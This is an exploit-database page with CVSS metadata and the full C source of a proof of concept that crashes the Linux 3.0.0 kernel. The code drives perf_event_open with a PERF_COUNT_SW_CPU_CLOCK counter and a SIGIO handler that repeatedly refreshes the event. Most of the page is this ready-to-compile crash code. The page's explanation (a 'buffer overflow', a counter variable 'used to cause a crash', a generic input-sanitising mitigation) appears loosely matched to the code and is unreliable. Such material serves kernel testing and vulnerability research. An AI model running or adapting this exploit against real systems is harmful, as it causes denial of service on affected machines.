Error with overflows and perf::perf_count_sw_cpu_clock

vendor:

Linux Kernel

by:

Vince Weaver

7.8

CVSS

HIGH

Buffer Overflow

120 (Buffer Copy without Checking Size of Input)

CWE

Product Name: Linux Kernel

Affected Version From: Linux 3.0.0

Affected Version To: Linux 3.0.0

Patch Exists: NO

Related CWE: N/A

CPE: o:linux:linux_kernel:3.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2012

Error with overflows and perf::perf_count_sw_cpu_clock

This test will crash Linux 3.0.0 by using a buffer overflow vulnerability. The exploit is triggered by a call to the perf_event_open() system call with a PERF_COUNT_SW_CPU_CLOCK configuration. This causes a SIGIO signal to be sent to the process, which is then handled by the our_handler() function. This function increments the total variable, which can be used to cause a crash.

Mitigation:

Ensure that all user input is properly validated and sanitized before being used in a system call.

Source

Exploit-DB raw data:

//Vince
/* Error with overflows and perf::perf_count_sw_cpu_clock                    */
/* This test will crash Linux 3.0.0                                          */
/* compile with gcc -O2 -o oflo_sw_cpu_clock_crash oflo_sw_cpu_clock_crash.c */
/* by Vince Weaver <vweaver1 _at_ eecs.utk.edu>                              */
#define _GNU_SOURCE 1

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>

#include <linux/perf_event.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/unistd.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <signal.h>

#include <sys/prctl.h>
#define MATRIX_SIZE 512
static double a[MATRIX_SIZE][MATRIX_SIZE];
static double b[MATRIX_SIZE][MATRIX_SIZE];
static double c[MATRIX_SIZE][MATRIX_SIZE];
static void naive_matrix_multiply(int quiet) {
  double s;
  int i,j,k;
  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      a[i][j]=(double)i*(double)j;
      b[i][j]=(double)i/(double)(j+5);
    }
  }
  for(j=0;j<MATRIX_SIZE;j++) {
     for(i=0;i<MATRIX_SIZE;i++) {
        s=0;
        for(k=0;k<MATRIX_SIZE;k++) {
	   s+=a[i][k]*b[k][j];
	}
        c[i][j] = s;
     }
  }
  s=0.0;
  for(i=0;i<MATRIX_SIZE;i++) {
    for(j=0;j<MATRIX_SIZE;j++) {
      s+=c[i][j];
    }
  }
  if (!quiet) printf("Matrix multiply sum: s=%lf\n",s);
  return;
}

static int total=0;
void our_handler(int signum,siginfo_t *oh, void *blah) {
  int fd=oh->si_fd;
  ioctl(fd , PERF_EVENT_IOC_DISABLE,0);
  total++;
  ioctl(fd , PERF_EVENT_IOC_REFRESH,1);
}
int perf_event_open(struct perf_event_attr *hw_event_uptr,
		    pid_t pid, int cpu, int group_fd, unsigned long flags) {
  return syscall(__NR_perf_event_open,hw_event_uptr,pid,cpu,group_fd,flags);
}
int main( int argc, char **argv ) {
	int fd;
	void *blargh;
	struct perf_event_attr pe;
	struct sigaction sa;
	memset(&sa, 0, sizeof(struct sigaction));
	sa.sa_sigaction=our_handler;
	sa.sa_flags=SA_SIGINFO;
	if (sigaction(SIGIO,&sa,NULL)<0) {
	  fprintf(stderr,"Error setting up signal handler\n");
	  exit(1);
	}
        memset(&pe,0,sizeof(struct perf_event_attr));	
	pe.type=PERF_TYPE_SOFTWARE;
	pe.size=sizeof(struct perf_event_attr);
        pe.config=PERF_COUNT_SW_CPU_CLOCK;
	pe.sample_period=100000;
	pe.sample_type=PERF_SAMPLE_IP;
	pe.read_format=PERF_FORMAT_GROUP|PERF_FORMAT_ID;
	pe.disabled=1;
	pe.pinned=1;
	pe.exclude_kernel=1;
	pe.exclude_hv=1;
	pe.wakeup_events=1;
	fd=perf_event_open(&pe,0,-1,-1,0);
	if (fd<0) {
	   printf("Error opening\n");
	}
	blargh=mmap(NULL,(1+2)*4096,PROT_READ|PROT_WRITE,MAP_SHARED,fd,0);
	fcntl(fd,F_SETFL,O_RDWR|O_NONBLOCK|O_ASYNC);
	fcntl(fd,F_SETSIG,SIGIO);
	fcntl(fd,F_SETOWN,getpid());
	ioctl(fd,PERF_EVENT_IOC_RESET,0);
	ioctl(fd,PERF_EVENT_IOC_ENABLE,0);
	naive_matrix_multiply(0);
	ioctl(fd,PERF_EVENT_IOC_DISABLE,0);
	munmap(blargh,(1+2)*4096);
	close(fd);
	printf("Total overflows: %d\n",total);
	return 0;
}